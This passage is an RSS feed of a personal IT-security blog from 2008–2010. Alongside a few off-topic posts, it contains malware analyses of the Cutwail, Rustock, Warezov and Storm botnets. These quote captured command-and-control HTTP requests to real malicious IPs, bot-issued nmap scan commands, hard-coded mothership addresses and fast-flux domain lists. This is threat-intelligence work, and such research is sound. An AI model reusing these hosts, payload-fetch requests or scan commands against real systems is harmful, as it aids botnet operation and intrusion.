<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>BjOG - Bjou's Blog, that is!</title>
	<atom:link href="http://www.bjou.de/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bjou.de/blog</link>
	<description>Whose Blog? Bjou's Blog!</description>
	<lastBuildDate>Wed, 20 Jan 2010 21:56:48 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Virtuelles Multitouch-Aquarium im Telekom Hauptquartier in Bonn</title>
		<link>http://www.bjou.de/blog/2010/01/virtuelles-multitouch-aquarium-im-telekom-hauptquartier-in-bonn/</link>
		<comments>http://www.bjou.de/blog/2010/01/virtuelles-multitouch-aquarium-im-telekom-hauptquartier-in-bonn/#comments</comments>
		<pubDate>Wed, 20 Jan 2010 21:56:48 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Fun]]></category>
		<category><![CDATA[Geek Talk]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=297</guid>
		<description><![CDATA[Diese Woche war ich zu &#8216;nem Security-Meeting in den Telekom Headquarters in Bonn unterwegs. Zwar nicht zum ersten Mal, trotzdem bin ich immer wieder fasziniert von diesem Bauwerk und seiner modernen Inneneinrichtung.
Diesmal hab ich jedoch was neues entdeckt &#8211; ein schönes großes Aquarium direkt in der Lobby. Habe mich selten so lange an einem Aquarium [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Diese Woche war ich zu &#8216;nem Security-Meeting in den Telekom Headquarters in Bonn unterwegs. Zwar nicht zum ersten Mal, trotzdem bin ich immer wieder fasziniert von diesem Bauwerk und seiner modernen Inneneinrichtung.<br />
Diesmal hab ich jedoch was neues entdeckt &#8211; ein schönes großes Aquarium direkt in der Lobby. Habe mich selten so lange an einem Aquarium aufgehalten wie an diesem, hier sehr ihr warum, habs mal getubed:</p>
<ul>
<li><a onclick="yt.EventManager.fireEvent('PlayVideos', '/watch?v=6lXt8c5ueJk'); return false;" href="http://www.youtube.com/watch?v=6lXt8c5ueJk">Multitouch Aquarium at Telekom Headquarters, Bonn (Part 1) </a></li>
<li><a onclick="yt.EventManager.fireEvent('PlayVideos', '/watch?v=sgMfGcOz8QY'); return false;" href="http://www.youtube.com/watch?v=sgMfGcOz8QY">Multitouch Aquarium at Telekom Headquarters, Bonn (Part 2)</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2010/01/virtuelles-multitouch-aquarium-im-telekom-hauptquartier-in-bonn/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Datenleck bei Saturn: Alles nur eine Frage der Technik?</title>
		<link>http://www.bjou.de/blog/2009/12/datenleck-bei-saturn-alles-nur-eine-frage-der-technik/</link>
		<comments>http://www.bjou.de/blog/2009/12/datenleck-bei-saturn-alles-nur-eine-frage-der-technik/#comments</comments>
		<pubDate>Tue, 29 Dec 2009 12:22:45 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=292</guid>
		<description><![CDATA[Die geflügelten Sprüche von Saturn, die man zu genüge aus Funk und Fernsehen kennt, werden mit dem aktuellen Datenleck im MP3-Shop ad absurdum geführt. So war es durch einfaches Surfen auf den Seiten des MP3-Shops möglich, auf die Daten von Dritten zuzugreifen &#8211; ohne irgendwelche Eingriffe in URL oder ähnlichem. Das ist ein klares Zeichen [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Die geflügelten Sprüche von Saturn, die man zu genüge aus Funk und Fernsehen kennt, werden mit dem aktuellen <a href="http://www.heise.de/newsticker/meldung/Datenleck-in-Saturns-MP3-Shop-893378.html" target="_blank"><strong>Datenleck im MP3-Shop</strong></a> ad absurdum geführt. So war es durch einfaches Surfen auf den Seiten des MP3-Shops möglich, auf die Daten von Dritten zuzugreifen &#8211; ohne irgendwelche Eingriffe in URL oder ähnlichem. Das ist ein klares Zeichen für einen <strong>Bug im Session Management der Applikation</strong>, einem Aspekt, der bei jedem ordentlich ausgeführten Web Application Penetrationstest eigentlich überprüft werden müsste. Durch den Fehler in der Web Applikation kam es nun also zu ungewolltem<strong> Session Hijacking</strong> durch Dritte.</p>
<ul>
<li>Geiz ist geil?</li>
<li>Alles nur eine Frage der Technik?</li>
</ul>
<p style="text-align: justify;">Zumindest wenn es um die <strong>Sicherheit der Kundendaten </strong>geht, ist Geiz zumindest nicht so geil. Lustig, dass Saturn trotzdem verspricht: &#8220;<em>Ihre bei uns gespeicherten Daten schützen wir und unsere Partnerunternehmen durch technische und organisatorische Maßnahmen, um einem Missbrauch durch Dritte wirkungsvoll vorzubeugen</em>&#8220;.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2009/12/datenleck-bei-saturn-alles-nur-eine-frage-der-technik/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wer ist schuld am Amoklauf von Winnenden?</title>
		<link>http://www.bjou.de/blog/2009/03/wer-ist-schuld-am-amoklauf-von-winnenden/</link>
		<comments>http://www.bjou.de/blog/2009/03/wer-ist-schuld-am-amoklauf-von-winnenden/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 10:38:19 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Mein Tach]]></category>
		<category><![CDATA[amoklauf]]></category>
		<category><![CDATA[counter-strike]]></category>
		<category><![CDATA[gewaltspiele]]></category>
		<category><![CDATA[winnenden]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=287</guid>
		<description><![CDATA[So tragisch und schlimm das alles ist, was gestern in Winnenden geschah: Die Schuldigen sind schon längst gefunden! Und wie nicht anders zu erwarten, sind es die üblichen Verdächtigen: Die Hersteller von Computer-Gewaltspielen. Sie haben es mal wieder geschafft und 15 unschuldige Menschen auf dem Gewissen.
Was musste ich heute auf Spiegel Online lesen?
Als bestätigt gilt [...]]]></description>
			<content:encoded><![CDATA[<p>So tragisch und schlimm das alles ist, was gestern in Winnenden geschah: Die Schuldigen sind schon längst gefunden! Und wie nicht anders zu erwarten, sind es die üblichen Verdächtigen: Die Hersteller von Computer-Gewaltspielen. Sie haben es mal wieder geschafft und 15 unschuldige Menschen auf dem Gewissen.</p>
<p>Was musste ich heute auf <a href="http://www.spiegel.de/panorama/justiz/0,1518,612826,00.html" target="_blank">Spiegel Online</a> lesen?</p>
<blockquote><p>Als bestätigt gilt inzwischen die Vorliebe des Amokläufers für Waffen und <strong>gewaltlastige Computerspiele</strong>. Demnach hat er in den vergangenen Monaten viel Zeit mit <strong>Killerspielen </strong>verbracht und in seiner Freizeit mit Softair-Waffen geschossen. &#8220;Das kann ich bestätigen&#8221;, sagte der Polizeisprecher Klaus Hinderer am Donnerstag der Deutschen Presse-Agentur. &#8220;Wir haben bei ihm unter anderem das Spiel <strong>Counter-Strike</strong> gefunden.&#8221;</p></blockquote>
<p>Weiter heißt es:</p>
<blockquote><p>&#8220;Dass der 17-Jährige auf der Flucht noch weiter um sich geschossen hat, <strong>ist ein Verhalten, das Jugendliche auch in Spielen wie Counter-Strike oder Crysis lernen können</strong>&#8220;, sagte der Präsident der Deutschen Stiftung für Verbrechensbekämpfung, Hans-Dieter Schwind, der &#8220;Neuen Osnabrücker Zeitung&#8221; und <strong>sprach sich für ein totales Verbot von Computer-Gewaltspielen [...] aus.<br />
</strong></p></blockquote>
<p>So einfach ist das. Ein Amoklauf und die Computerspiele sind schuld, nicht wahr, sehr geehrter Herr Schwind? Dass man diese Spiele aber garnicht verbieten kann, ist Ihnen auch klar? Wer ein solches Spiel will, der bekommt es auch. Das Internet bietet ungeahnte Möglichkeiten. Vielmehr sollte man soziale Kompetenzen und Vertrauenswerte aufbauen, denn kein gesunder Mensch, der sozial integriert und nicht psychisch labil ist, hat einen solchen Knacks weg. Millionen Menschen spielen weltweit gewalttätige Spiele. Aussetzer gibt es nur in Promillefällen und selbst hier ist nicht gesagt, dass die Spiele ein Grund dafür sind.</p>
<p>Ich für meinen Teil würde alle Autorennspiele verbieten. Täglich sterben Menschen auf deutschen Straßen aufgrund von Raserei. Raserei <strong>ist ein Verhalten, das Jugendliche auch in Spielen wie Need-for-Speed oder Grand Theft Auto lernen können</strong>. Daher spreche ich mich hiermit <strong> für ein totales Verbot von Computer-Rennspielen aus.</strong> Schließlich bieten Autos Gefahrenpotentiale, durch welche in Deutschland wesentlich mehr Menschen umkommen als durch Schusswaffen.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2009/03/wer-ist-schuld-am-amoklauf-von-winnenden/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>McColo offline &#8211; Spam Volume drops</title>
		<link>http://www.bjou.de/blog/2008/11/mccolo-offline-spam-volume-drops/</link>
		<comments>http://www.bjou.de/blog/2008/11/mccolo-offline-spam-volume-drops/#comments</comments>
		<pubDate>Thu, 13 Nov 2008 16:44:37 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Mein Tach]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=277</guid>
		<description><![CDATA[After McColo has been taken offline, the Washington Post features nice graphs on how the spam volume dropped due to a massive amount of Command-and-Control servers hosted at McColo Corp.
]]></description>
			<content:encoded><![CDATA[<p>After McColo has been taken offline, the <a href="http://voices.washingtonpost.com/securityfix/2008/11/spam_volumes_drop_by_23_after.html">Washington Post</a> features nice graphs on how the spam volume dropped due to a massive amount of Command-and-Control servers hosted at McColo Corp.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/11/mccolo-offline-spam-volume-drops/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Datenklau ganz leicht gemacht</title>
		<link>http://www.bjou.de/blog/2008/10/datenklau-ganz-leicht-gemacht/</link>
		<comments>http://www.bjou.de/blog/2008/10/datenklau-ganz-leicht-gemacht/#comments</comments>
		<pubDate>Wed, 29 Oct 2008 00:26:48 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[brute-force]]></category>
		<category><![CDATA[datenklau]]></category>
		<category><![CDATA[hash]]></category>
		<category><![CDATA[id]]></category>
		<category><![CDATA[mapping]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=270</guid>
		<description><![CDATA[Der große Datenklau-Skandal bei der Telekom ist noch nicht lange her. Dass ein solches Fiasko ein Unternehmen in schlechtes Licht rücken kann, ist jedermann klar. Trotzdem ist es immer wieder erschreckend, auf welch leichte Schulter einige Unternehmen ihre Datensicherheit nehmen. Naivität ist hier ganz groß geschrieben &#8211; erst recht, wenn eine Lücke bekannt ist, aber [...]]]></description>
			<content:encoded><![CDATA[<p>Der große <a href="http://www.manager-magazin.de/it/artikel/0,2828,583203,00.html">Datenklau-Skandal</a> bei der Telekom ist noch nicht lange her. Dass ein solches Fiasko ein Unternehmen in schlechtes Licht rücken kann, ist jedermann klar. Trotzdem ist es immer wieder erschreckend, auf welch leichte Schulter einige Unternehmen ihre Datensicherheit nehmen. Naivität ist hier ganz groß geschrieben &#8211; erst recht, wenn eine Lücke bekannt ist, aber sich einfach keiner darum kümmern mag/darf/soll.</p>
<p>Vor ein paar Jahren hatte ich mich bei einer Agentur eingeschrieben, die Hochschulabsolventen, Young Professionals und Studierende in Teil- oder Vollzeit an Unternehmen vermittelt. Nachdem ich nun (auf anderen Wegen) einen Job gefunden habe, wollte ich meine Daten dort löschen (lassen). Zugriff auf sein eigenes hinterlegtes Profil in der Datenbank (für Updates) erlangte man über einen einfachen Link der Form</p>
<p><code>http://www.firma.xx/xxxxxxxx/xxxxxx.php?id=&lt;userID&gt;&#038;hash=&lt;someHash&gt;</code></p>
<p>Verdächtig genug &#8211; keinerlei weitere Authentifikation. Der Hash, als Mapping auf die ID, sollte wohl Verifikation genug sein, um nicht auf andere Daten zugreifen zu können. Eine Art Passwort also, das der User jedoch nicht kennen muss, außer er will seine eigenen Daten updaten. Dann bekommt er den Link über die Firma zugeschickt. Um die Daten zu löschen fand man im eigenen Bestand jedoch keine Möglichkeit, also bat ich darum per e-mail. Long story short: Trotz Versicherung, dass die Daten gelöscht würden, geschah lange nichts und ich musste die Jungs dort vier Mal anschreiben &#8211; eigentlich unverschämt. Irgendwann wurde es mir zu viel und ich begann, das oben genannte Mapping über den Hash auf Sicherheitstauglichkeit zu überprüften. Die Sicherheitslücke, die ich dort fand, war gravierend. Letzendlich wurde der Raum, den der Hash bot, nicht einmal voll ausgenutzt, was es prinzipiell ermöglicht, über einfachste Brute-Force Techniken Nutzerdaten auszulesen. Eine kleine Hochrechnung zeigte, dass nur wenige Trial &#038; Error Requests zur vollkommenen Entblößung des Datenbestandes weiterer Nutzer führte. Das Krasse an der Geschichte ist jedoch, dass das Unternehmen trotz meiner sofortigen Alarmierung mit der dringenden Bitte, diesen Security-Fauxpas zu fixen, bis heute (drei Wochen später) nichts dergleichen unternommen hat. Nicht einmal ein Statement wurde dazu abgegeben, ich bekam keine Antwort auf den Sachverhalt. Aber wenigstens habe ich erreicht was ich eigentlich wollte: Meine Daten sind gelöscht und damit erstmal sicher&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/10/datenklau-ganz-leicht-gemacht/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cutwail and Rustock/Costrat: Same Command-and-Control Network</title>
		<link>http://www.bjou.de/blog/2008/09/cutwail-and-rustockcostrat-same-cc/</link>
		<comments>http://www.bjou.de/blog/2008/09/cutwail-and-rustockcostrat-same-cc/#comments</comments>
		<pubDate>Wed, 24 Sep 2008 12:28:02 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[backend]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[control nodes]]></category>
		<category><![CDATA[costrat]]></category>
		<category><![CDATA[cutwail]]></category>
		<category><![CDATA[indentical]]></category>
		<category><![CDATA[mccolo]]></category>
		<category><![CDATA[mothership]]></category>
		<category><![CDATA[rustock]]></category>
		<category><![CDATA[same]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=263</guid>
		<description><![CDATA[Yesterday I posted an analysis of Cutwail, today, while analyzing a Rustock/Costrat binary, I found something interesting:
Cutwail issued the following command to 208.66.194.232:80 (hosted by McColo, known for hosting nefarious stuff)
GET /40E80010484449525657494F5357594C49584F456C000000066600000000760000046BEB000530CDE1E7ED HTTP/1.0
receiving the answer from the web server
HTTP/1.0 200 OK
Date: Fri, 29 Aug 2008 18:21:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Fri, 29 Aug 2008 18:21:44 [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday <a href="http://www.bjou.de/blog/2008/09/a-little-cutwail-spambot-analysis-on-network-traffic/">I posted an analysis of Cutwail</a>, today, while analyzing a Rustock/Costrat binary, I found something interesting:</p>
<p>Cutwail issued the following command to 208.66.194.232:80 (hosted by McColo, known for hosting nefarious stuff)<br />
<code>GET /40E80010484449525657494F5357594C49584F456C000000066600000000760000046BEB000530CDE1E7ED HTTP/1.0</code></p>
<p>receiving the answer from the web server</p>
<p><code>HTTP/1.0 200 OK<br />
Date: Fri, 29 Aug 2008 18:21:44 GMT<br />
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9<br />
Last-Modified: Fri, 29 Aug 2008 18:21:44 GMT<br />
Cache-Control: no-cache<br />
Content-Length: 326160<br />
Connection: close<br />
Content-Type: application/octet-stream</code></p>
<p>followed by an encrypted/encoded binary. I have not been able to check that file out by now, but I might provide it to the interested reader upon request. The Rustock/Costrat binaries connect to the same network. These connections by Rustock to 208.66.194.0/24 are verified by <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2006-070513-1305-99&#038;tabid=2">Symantec</a> and <a href="http://www.threatexpert.com/report.aspx?uid=d82a1037-93c8-4842-9fcd-771248c98b40">ThreatExpert</a>.</p>
<p>Yet another proof that the <a href="http://taint.org/2008/08/28/123704a.html">top spam botnets are linked together in certain ways</a>, this time in command-and-control.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/09/cutwail-and-rustockcostrat-same-cc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>A little Cutwail spambot analysis on network traffic</title>
		<link>http://www.bjou.de/blog/2008/09/a-little-cutwail-spambot-analysis-on-network-traffic/</link>
		<comments>http://www.bjou.de/blog/2008/09/a-little-cutwail-spambot-analysis-on-network-traffic/#comments</comments>
		<pubDate>Tue, 23 Sep 2008 23:11:13 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[botnets]]></category>
		<category><![CDATA[breack captcha]]></category>
		<category><![CDATA[cutwail]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[pushdo]]></category>
		<category><![CDATA[scanning]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[templates]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=255</guid>
		<description><![CDATA[Recently, while analyzing network traffic of a Cutwail binary (a spambot commonly installed by a trojan of the Pushdo family), I found some interesting behavior in its command-and-control communication. Although I expected some encrypted HTTP communication on port 4080 as stated in the recent research about the TOP Spam Botnets from April 2008, I found [...]]]></description>
			<content:encoded><![CDATA[<p>Recently, while analyzing network traffic of a Cutwail binary (a spambot commonly installed by a trojan of the Pushdo family), I found some interesting behavior in its command-and-control communication. Although I expected some encrypted HTTP communication on port 4080 as stated in the recent research about the <a href="http://www.secureworks.com/research/threats/topbotnets/?threat=topbotnets">TOP Spam Botnets</a> from April 2008, I found a completely different setup. First, there have been over a dozen backend nodes (motherships) all in the 216.195.[52-63] range. Analyzing the binary revealed more hard-coded IP addresses in Russia and the US:<span id="more-255"></span><br />
<center><br />
<!--adsense#anzeigenblocknurtext--><br />
</center><br />
<code><br />
78.109.30.80<br />
78.109.30.64<br />
78.109.30.56<br />
78.109.30.48<br />
78.109.30.24<br />
78.109.30.32<br />
78.109.30.16<br />
78.109.29.240<br />
78.109.29.232<br />
78.109.30.8<br />
216.195.63.18<br />
216.195.57.116<br />
208.71.130.48<br />
208.71.130.144<br />
216.195.63.19<br />
216.195.63.20<br />
216.195.63.25<br />
216.195.63.36<br />
216.195.56.250<br />
216.195.56.251<br />
216.195.57.125<br />
216.195.63.21<br />
216.195.63.22<br />
216.195.63.23<br />
216.195.63.24<br />
216.195.52.17<br />
216.195.52.18<br />
216.195.52.157<br />
</code></p>
<p>Moreover, traffic was not completely encrypted and not at all on port 4080/tcp. Ports in use have been 7230/tcp (encrypted), 8195/tcp (encrypted), 8001/tcp (plain), 3078 (plain) and 3128 (plain with base64-encoded HTTP payload representing IP addresses (in decimal) for whatever reason, see below). Again, data shown is not sanitized or censored in any way.</p>
<p><code>POST / HTTP/1.1<br />
Accept: */*<br />
Accept-Language: en<br />
Cache-Control: no-cache<br />
Pragma: no-cache<br />
Accept-Charset: iso-8859-1<br />
Accept-Encoding: gzip, deflate<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)<br />
Host: 216.195.55.10:3128<br />
Content-Length: 85<br />
Connection: Keep-Alive</p>
<p>data=5NIkrmdE9mkmNhBBD+yxLNZAUjtwQNC0uO4Gxf17PH6RUuBFmKfWGzYC6IecvQ3INDLDOEaJlyr37hwE</p>
<p>HTTP/1.1 200 OK<br />
Accept-Ranges: bytes<br />
Connection: close<br />
Content-Type: text/html<br />
Cache-Control: no-cache<br />
Date: Fri, 29 Aug 2008 19:23:32 GMT<br />
Last-Modified: Fri, 29 Aug 2008 19:23:32 GMT<br />
Server: Apache/1.3.35 (Unix) PHP/4.4.2<br />
Content-Length: 110</p>
<p>{NTQx9k+dqZV6afQgf2ABxEjDK5OPtU2/XPa8nj4GndeDqESDAmD0XeGBu1SS7ux0pL9vTIIFzqeYtyMXbJQMOZxHIz2ZaBBWFnttDXrlUcp=}.</code><br />
<center><br />
<!--adsense#linkblockbreit--><br />
</center><br />
Moreover, I found that the bots tried to automatically create Hotmail accounts using an XML template that has been provided by a mothership before. <a href="http://www.bjou.de/blog/wp-content/uploads/cutwailTemplate.txt">I uploaded the template for the interested reader</a>. This template is a guide through the Hotmail signup form, apparently also able to break CAPTCHAs. Furthermore, one bot additionally downloaded nmap and received instructions from a mothership containing nmap options and IP addresses. </p>
<p><code>.{....+\....-T5 -sV.128.194.136.173.53,80...+\....-T5 -sV.128.194.136.147.53,80...+\....-T5 -sV.128.194.137.81.53,80...+\....-T5 -sV.128.194.137.101.53,80...+\....-T5 -sV.128.194.136.240.53,80...+\....-T5 -sV.128.194.137.16.53,80...+\....-T5 -sV.128.194.137.136.53,80...+\....-T5 -sV.128.194.137.95.53,80...+\....-T5 -sV.128.194.137.35.53,80...+\....-T5 -sV.128.194.137.42.53,80.</code></p>
<p>Option -sV: Probe open ports to determine service/version info<br />
Option -T5: Set timing template (higher is faster) <&#8211; 5 is the highest</p>
<p>As can be seen, the control in the botnet&#8217;s background is done via pretty diverse channels. Of course, one major task of the bot is still spamming, this short analysis concentrated on its C&#038;C, however, using binaries from July/August 2008. Note, that this study might not be up to date any more by now&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/09/a-little-cutwail-spambot-analysis-on-network-traffic/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>New Fast-Flux Domains served by Warezov/Stration</title>
		<link>http://www.bjou.de/blog/2008/08/new-fast-flux-domains-served-by-warezovstration/</link>
		<comments>http://www.bjou.de/blog/2008/08/new-fast-flux-domains-served-by-warezovstration/#comments</comments>
		<pubDate>Mon, 11 Aug 2008 16:39:21 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[domain names]]></category>
		<category><![CDATA[fast flux]]></category>
		<category><![CDATA[stration]]></category>
		<category><![CDATA[warezov]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=245</guid>
		<description><![CDATA[Quick and dirty: Some new domain names (most of them created end of last week (7th-9th of August)) found during my analysis of a Warezov/Stration Binary. All of them are fast-fluxed. Expect some spam with these domains pretty soon. It probably already started, as my Honeypot served a lot of DNS Queries. Some domains already [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.bjou.de/blog/wp-content/uploads/warezov-ff.png"><img src="http://www.bjou.de/blog/wp-content/uploads/warezov-ff-150x150.png" alt="" title="warezov-ff" width="150" height="150" class="alignleft size-thumbnail wp-image-246" hspace=5 vspace=5 /></a>Quick and dirty: Some new domain names (most of them created end of last week (7th-9th of August)) found during my analysis of a Warezov/Stration Binary. All of them are fast-fluxed. Expect some spam with these domains pretty soon. It probably already started, as my Honeypot served a lot of DNS Queries. Some domains already work (&#8220;<a href="http://www.spamtrackers.eu/wiki/index.php?title=Canadian_Pharmacy">European Pharmacy</a>&#8220;, see screenshot), others still don&#8217;t. Domain Name List:<br />
<span id="more-245"></span><br />
aboutfight.com<br />
actwalk.com<br />
agaj.originalhour.com<br />
angerrub.com<br />
areice.com<br />
beautyeither.com<br />
behindmountain.com<br />
bothcatch.com<br />
brotherfound.com<br />
callsuffix.com<br />
changecame.com<br />
circlehas.com<br />
commonwant.com<br />
considercrop.com<br />
cookchair.com<br />
countrybroad.com<br />
cowsquare.com<br />
determinenew.com<br />
developan.com<br />
divisionword.com<br />
drawred.com<br />
driveuntil.com<br />
earsection.com<br />
elsewinter.com<br />
especiallydesert.com<br />
especiallymillion.com<br />
excitecount.com<br />
factself.com<br />
finalfarm.com<br />
gh.originalhour.com<br />
girlbird.com<br />
glasswild.com<br />
happyany.com<br />
hereproduce.com<br />
highproper.com<br />
hitnecessary.com<br />
holdrail.com<br />
inchevent.com<br />
indicatelisten.com<br />
interestsell.com<br />
joinlevel.com<br />
laughname.com<br />
legbe.com<br />
meetclaim.com<br />
middleglass.com<br />
muchthey.com<br />
naturalbegin.com<br />
onbranch.com<br />
originalhour.com<br />
pitchtouch.com<br />
pointjoin.com<br />
possiblesaid.com<br />
pullgone.com<br />
qprzyr.originalhour.com<br />
recordchief.com<br />
rememberseed.com<br />
richeach.com<br />
ridespread.com<br />
rlek.originalhour.com<br />
<a href="http://www.siteadvisor.com/sites/rolldivision.com/postid/?p=1052106">rolldivision.com</a><br />
roperoll.com<br />
safeelement.com<br />
seasonleave.com<br />
seatfear.com<br />
seemship.com<br />
sibt.originalhour.com<br />
sightevening.com<br />
sliphalf.com<br />
solutionthrow.com<br />
speakoccur.com<br />
stoodplane.com<br />
suffixsupport.com<br />
systemneighbor.com<br />
thisistestdomain.ntd<br />
truckproperty.com<br />
typefeel.com<br />
u.originalhour.com<br />
whilemeasure.com<br />
wholehis.com<br />
www.actwalk.com<br />
www.beentouch.com<br />
www.bothcatch.com<br />
www.developan.com<br />
www.especiallymillion.com<br />
www.excitecount.com<br />
www.fruitspell.com<br />
www.girlbird.com<br />
www.glasswild.com<br />
www.happyany.com<br />
www.inchevent.com<br />
www.ormade.com<br />
www.pointjoin.com<br />
www.rolldivision.com<br />
www.suffixsupport.com<br />
www.systemneighbor.com<br />
www.thankbranch.com<br />
www.trackpaint.com<br />
www.typefeel.com<br />
www.whethermotion.com<br />
yetamong.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/08/new-fast-flux-domains-served-by-warezovstration/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Storm Campaign and Domains</title>
		<link>http://www.bjou.de/blog/2008/08/new-storm-campaign-and-domains/</link>
		<comments>http://www.bjou.de/blog/2008/08/new-storm-campaign-and-domains/#comments</comments>
		<pubDate>Mon, 04 Aug 2008 17:56:28 +0000</pubDate>
		<dc:creator>bjou</dc:creator>
				<category><![CDATA[Geek Talk]]></category>
		<category><![CDATA[IT-Security]]></category>
		<category><![CDATA[fast flux]]></category>
		<category><![CDATA[new campaign]]></category>
		<category><![CDATA[postcard.exe]]></category>
		<category><![CDATA[storm domains]]></category>
		<category><![CDATA[storm worm]]></category>

		<guid isPermaLink="false">http://www.bjou.de/blog/?p=236</guid>
		<description><![CDATA[Now I am not a tracker of storm campaigns nor binaries, I am just a casual binary analyst, but today while running a storm gateway for research purposes, I found some new domains going along with the revisited love theme and its postcard.exe.
worldpostcardart.com
superlettercard.com
yourlettercard.com
freepostcardonline.com
digitalaudiopostcard.com
lettercardadvertising.com
bestlettercard.com
audiopostcardmail.com
supergreetingcard.com
oldpostcardshop.com
While all the above domains have been created on August, 2nd, the following [...]]]></description>
			<content:encoded><![CDATA[<p>Now I am not a tracker of storm campaigns nor binaries, I am just a casual binary analyst, but today while running a storm gateway for research purposes, I found some new domains going along with the <a href="http://www.sudosecure.net/archives/189">revisited love theme and its postcard.exe</a>.</p>
<p>worldpostcardart.com<br />
superlettercard.com<br />
yourlettercard.com<br />
freepostcardonline.com<br />
digitalaudiopostcard.com<br />
lettercardadvertising.com<br />
bestlettercard.com<br />
audiopostcardmail.com<br />
supergreetingcard.com<br />
oldpostcardshop.com</p>
<p>While all the above domains have been created on August, 2nd, the following domain offers the Nameservers and has been created on July, 28th</p>
<p>brprbgok6.com</p>
<p><strong>Dig</strong>ing these domains returns one IP with a TTL of 60 seconds, indicating <a href="http://www.honeynet.org/papers/ff/fast-flux.html">Fast-Flux</a>. I have not investigated earlier campaigns, but I wondered why only one IP was returned; typically for Fast-Flux, there is a whole bunch of short-lived IPs returned for one domain name.</p>
<p>The campaign&#8217;s website is kept simple:<br />
<code>Your download will start shortly. If you are unable to see your postcard, save it in and run on your computer.<br />
</code></p>
<p>The Binaries&#8217; AntiVir Detection Rate is <strong>19/36</strong> (52.78%)</p>
<p>As I am the first to blog this and as I am currently not running a Storm Spambot, I guess we need to wait for <a href="http://www.sudosecure.net/">Jeremy</a> to fire up his automated extraction scripts for more insight on the respective spam messages <img src='http://www.bjou.de/blog/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><strong>Update Aug 6th</strong>: Today I found more information on the spam messages at the Trend Micro Blog: <a href="http://blog.trendmicro.com/storm-uses-old-bait/">http://blog.trendmicro.com/storm-uses-old-bait/</a>.<br />
Took them some time though&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.bjou.de/blog/2008/08/new-storm-campaign-and-domains/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>Interesting Pattern in Storm Worm Traffic</title>
		<link>http://www.bjou.de/blog/2008/07/interesting-pattern-in-storm-worm-traffic/</link>
		<comments>http://www.bjou.de/blog/2008/07/interesting-pattern-in-storm-worm-traffic/#comments</comments>
